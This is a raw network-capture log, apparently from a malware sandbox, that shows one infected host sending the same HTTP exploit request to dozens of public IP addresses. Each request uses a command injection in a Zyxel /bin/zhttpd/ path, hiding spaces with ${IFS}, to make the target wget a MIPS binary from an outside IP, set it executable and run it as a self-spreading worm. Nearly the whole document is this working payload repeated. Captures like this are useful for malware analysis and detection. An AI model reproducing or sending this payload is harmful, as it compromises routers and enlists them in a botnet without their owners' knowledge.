                                                        Feb 2, 2024 06:21:23.204690933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7713192.168.2.143463824.101.195.158443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.204736948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7714192.168.2.1434278174.182.50.147443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.204786062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7715192.168.2.1455230118.168.149.201443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.204819918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7716192.168.2.144887454.46.74.219443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.204838991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7717192.168.2.1438120135.21.139.160443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.204891920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7718192.168.2.1456366207.109.213.66443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.204916000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7719192.168.2.144534627.135.35.94443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.204973936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7720192.168.2.1449016162.198.167.210443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.204999924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7721192.168.2.1454906175.226.154.167443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.205058098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7722192.168.2.145419487.203.64.203443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.205166101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7723192.168.2.143669665.157.205.189443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.205204010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7724192.168.2.1454058218.74.242.177443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.205230951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7725192.168.2.1442740169.247.225.11443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.205287933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7726192.168.2.1447104134.235.37.63443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.205312967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7727192.168.2.14477385.92.98.228443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.205347061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7728192.168.2.1451374193.121.104.148443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.205383062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7729192.168.2.143364253.191.186.201443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.205423117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7730192.168.2.146000495.92.0.91443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.205460072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7731192.168.2.1447572216.28.169.10443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.205499887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7732192.168.2.1456208168.218.72.2443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.205522060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7733192.168.2.1433306137.96.23.228443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.205568075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7734192.168.2.144053658.67.236.202443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.205620050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7735192.168.2.1444970202.72.94.73443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.205635071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7736192.168.2.1434568161.76.79.118443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.205703020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7737192.168.2.143327259.139.126.153443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.205724955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7738192.168.2.145610831.148.188.197443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.205763102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7739192.168.2.1459716189.226.197.201443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.205807924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7740192.168.2.1451296160.132.249.156443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.205848932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7741192.168.2.1446620149.186.29.251443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.205882072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7742192.168.2.144306685.82.222.55443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.205928087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7743192.168.2.144616090.230.65.48443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.205965042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7744192.168.2.1448996175.27.115.184443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.206001043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7745192.168.2.1434596189.118.205.164443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.206046104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7746192.168.2.1439140173.94.236.248443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.206093073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7747192.168.2.1443422203.40.49.87443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.206126928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7748192.168.2.145718691.232.212.149443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.206160069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7749192.168.2.1460244161.139.101.209443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.206202030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7750192.168.2.1446344179.176.117.200443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.206209898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7751192.168.2.1454934118.30.15.129443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.206295013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7752192.168.2.1451630110.172.56.183443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.206329107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7753192.168.2.145357084.213.60.94443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.206368923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7754192.168.2.1436796146.251.245.11443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.206413031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7755192.168.2.1432786196.109.160.79443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.206444025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7756192.168.2.1451074217.126.18.156443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.206484079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7757192.168.2.1433170192.48.130.99443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.206521034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7758192.168.2.143596012.9.192.184443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.206561089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7759192.168.2.145469461.96.55.70443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.206605911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7760192.168.2.1450556161.28.25.26443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.206655979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7761192.168.2.144270852.133.5.133443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.206696987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7762192.168.2.1436720163.107.180.107443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.206733942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7763192.168.2.145401218.52.45.206443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.206768036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7764192.168.2.1433780201.72.50.216443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.206826925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7765192.168.2.1456634209.61.58.157443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.206855059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7766192.168.2.1445692200.195.25.89443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.206892014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7767192.168.2.145509893.62.254.193443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.206916094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7768192.168.2.1444394138.105.163.210443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.206959963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7769192.168.2.145848440.30.85.107443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.207016945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7770192.168.2.145261064.81.124.78443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.207048893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7771192.168.2.145204257.44.54.178443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.207082033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7772192.168.2.144895617.52.221.77443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.207123995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7773192.168.2.1434416175.60.66.70443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.207143068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7774192.168.2.143522223.217.111.68443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:23.207192898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7775192.168.2.1447396109.160.151.46443
                                                        TimestampBytes transferredDirectionData
